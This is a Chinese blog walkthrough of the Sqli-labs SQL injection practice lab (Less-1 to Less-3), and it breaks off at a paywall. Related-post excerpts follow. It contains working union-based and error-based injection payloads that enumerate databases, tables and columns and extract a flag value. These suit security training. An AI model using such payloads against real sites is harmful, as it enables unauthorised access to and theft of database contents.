Sqli-labs(Page-1)1-22

最新推荐文章于 2023-04-03 21:10:47 发布
最新推荐文章于 2023-04-03 21:10:47 发布
阅读量480 收藏
点赞数
分类专栏: web类 日常刷题 文章标签: mysql 信息安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/105752261
版权

注入的sql一直想写来着的。之前数据库课偷懒的我,留下了悔恨的眼泪。。。(后面看着太烦了就没听了)

Less-1

order by语句

order by(默认升序排列) 可以测试一下当前一共select了多少个字段

select * from user where username='1' ORDER BY 3 -- +'

union 联合查询语句

union前后的两个sql语句的选择列数要相同才可以。Union all与union 的区别是增加了去重的功能。当id的数据在数据库中不存在时,(此时我们可以id=-1,两个sql语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的union 的数据。

select * from user where username='-1' UNION select 1,version(),database() -- +

查询版本号,数据库名
在这里插入图片描述

数据库名,利用information_schema.SCHEMATA这个表

select * from user where username='-1' UNION select 1,group_concat(SCHEMA_NAME),4 FROM information_schema.SCHEMATA -- +'

在这里插入图片描述

查表,利用information_schema.TABLES这个表

select * from user where username='-1' UNION select 1,group_concat(table_name),4 FROM information_schema.`TABLES` WHERE TABLE_SCHEMA='ctftraining' -- +'

在这里插入图片描述

报ctftraining数据库的flag表的字段名

select * from user where username='-1' UNION select 1,group_concat(column_name),4 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='ctftraining' AND TABLE_NAME='flag' -- +'

在这里插入图片描述

查找ctftraining数据库的flag表的flag字段的值

select * from user where username='-1' UNION select 1,group_concat(flag),4 FROM ctftraining.flag -- +'

在这里插入图片描述

less-2

1 ' -- +发现报错了,应该是应该是单引号影响了闭合。题目又说整数型报错。
所以猜测语句为:

$sql="select * from users where id='$id'";

所以不需要闭合直接用lesss-1的payload就行了,以防万一注释掉后面的内容

select * from user where username='-1' UNION select 1,group_concat(flag),4 FROM ctftraining.flag -- +'

less-3

简单注入了一下看报错

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'union select 1,2,3 -- ') LIMIT 0,1' at line 1

猜测语句:

$sql=&#

最低0.47元/天 解锁文章
ChenZIDu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 1-65教程
任小海博客
08-19 1万+
导语 做完DVWA感觉还是对sql注入了解不够多,尝试做了一下这个实验。 里面是所有的payload和一些解释。 Less1-35 Less-1 Please input the ID as parameter with numeric value 尝试输入ID=1’ 这是一个字符型注入 Payload : id=1’ Less-2 这是一个数字型注入 Payload : ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(Page 1)
Lorezon的博客
04-10 306
Less-01 单引号报错。 拼接'and 1=1--+正常,=2异常: 这里直接使用update函数报错注入。 ' and updatexml(1,concat(0x7e,database()),1)--+,直接爆出数据库名。 爆表:' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables ...
sqli-labs page-1
Pz_mstr's Blog
09-10 469
一、前言 终于通关了page-1的内容,现在做一下阶段性的总结。 二、注入思路 三、各关卡讲解 level-1 level-2 level-3 level-4 level-5 level-6 level-7 level-8 level-9 level-10 level-11 level-12 level-13 level-14 level-15 l
SQLI-LABS Page-1
Web学习之路
04-03 278
sqli-labs page-1
SQLi-LABS Page-1 (get篇) 中
weixin_43164512的博客
12-23 180
先说一个确定列数的方法 ?id=1 order by 3 %23 order by 如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的 ORDER BY 子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果。这里就是利用这个功能,通过报错来判别列数。 通过不断增加 order by 后的数字,达到确定列数的目的。 如下面两图,为 3 时,页面正常,为 4 时,页面报错。这...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
SQLi-LABS Page-1 (get篇) 上
weixin_43164512的博客
12-17 160
起因 近期打算考一下CISP-PTE,所以找出了多年前的Sqli-libs,准备再刷一遍sql注入,把一些要点记录一下方便以后复习,并和大家分享一下。 准备知识 Sqli-libs使用mysql数据库,如果你对mysql比较精通,可以跳过本段。 在Sqli-libs中我们需要了解mysql这几个库、表和字段。 information_schema数据库表 它保存着关于MySQL服务器所维护的...
SQLI-LABS——Page-1 Basic Challenges Less-1~Less-20
Ho1aAs‘s Blog
03-28 519
文章目录前言题解Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-20完 前言 记录一下SQLI-LABS基础部分前二十题,(某些题目只爆出了库名 以下是盲注tips: 时间盲注 报错注入 布尔盲注 题解 Less-1 最简单的单引号字符型注入,回显点有两个,注入两个group_cocnat() [
SQLI-LABS Page1 1-10
菜的只能随便写写博客
12-14 334
0x01 Less-1 字符报错注入 简单报错注入,分号检测 payload: http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数,字段为3 http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+ 查看用户:sqli@localhost http://192.168.44.139/sqli-labs/Less-
SQL注入【SQLi-LABS Page-1(Basic Challenges Less1-Less22)】
小谢的博客
12-05 1820
本篇博客用于记录`SQLi`实验中第一阶段,即基础的`sql`注入,包括了GET和POST联合注入、时间盲注、布尔盲注、报错盲注、文件上传注入等并且内含一些笔者写的自动化注入代码~
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1035
关于Sqli-labs靶场的搭建,这篇文章只做解题。
Sqli-labs解题一(Page-1-Basic Challenges)
Bird&Bird
01-05 1545
目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入 输入单引号’,页面报错如下 根据报错知道是单引号字符型注入 判断有多少列(ORDER BY 语句用于根据指定的列对结果集进行排序) ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat
sqli-labs靶场Page1(Basic Challenges)练习记录3
风不归的乐园
11-12 149
sqli-labs靶场Page1(Basic Challenges)练习记录3
sqli-labs过关笔记(Page-1:1-22关)
1stPeak's Blog
03-23 1182
判断注入类型详解 (1)首先id=1肯定没错 http://127.0.0.1/?id=1 //正常 (2)加单引号 http://127.0.0.1/?id=1' //正常,很大几率不存在注入;不正常,存在注入 (3)判断数字型 http://127.0.0.1/?id=1 and 1=1//正常 http://127.0.0.1/?id=1 and 1=2//不正常 基本上可以确定是数字型...
sql-labs1
Braindance
02-28 319
前言 在线靶机地址:https://buuoj.cn/challenges#sqli-labs less-1 ​ 首先说明sql注入的大致步骤: 判断注入类型。如整型字符型注入等。 判断列数 判断数据的回显位 构造sql语句 ​ 根据题目提示,说明是一个单引号注入题目,构造一个带单引号的语句?id=1',发现数据库报错 ​ 通过后面的报错语句1'' LIMIT 0,1的分析,我们的单引号被数据库解析,那么说明我们也可以使用连接查询union插入我们想要查询的语句。 ​ 推出数据库的查询的部分语句可能.
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值